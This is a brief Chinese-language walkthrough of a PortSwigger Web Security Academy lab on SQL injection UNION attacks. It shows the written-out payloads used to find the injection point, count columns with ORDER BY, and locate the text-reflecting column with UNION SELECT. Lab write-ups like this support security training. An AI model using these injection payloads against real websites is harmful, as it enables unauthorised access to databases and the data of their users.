Lab: SQL injection UNION attack, finding a column containing text
传送门:https://portswigger.net/web-security/sql-injection/union-attacks/lab-find-column-containing-text
看一下本关描述
简单来说就是判断回显点在哪,然后把他提供的随机字符串或者什么随机值给在那个回显点给回显出来即可
开始练习
第一步:判断注入点
随便点几下,发现url有参数控制,所以测试url有无注入点,直接在后面输入单引号--+,发现回显在标题,所以这里有注入点
第二步:判断联合查询的列数
我这里使用order by进行判断
category=Gifts' order by 1--+
category=Gifts' order by 2--+
category=Gifts' order by 3--+
都回显正常
category=Gifts' order by 4--+的时候出现错误,所以联合查询的列数只有3个
第三步:判断回显点
使用category=Gifts' union select '888','555','666'--+判断出只有555那个位置回显了,所以回显点在那里
第四步:将系统提供的数值在那里回显即可
将pt6l9C放到第二个位置即可
完成!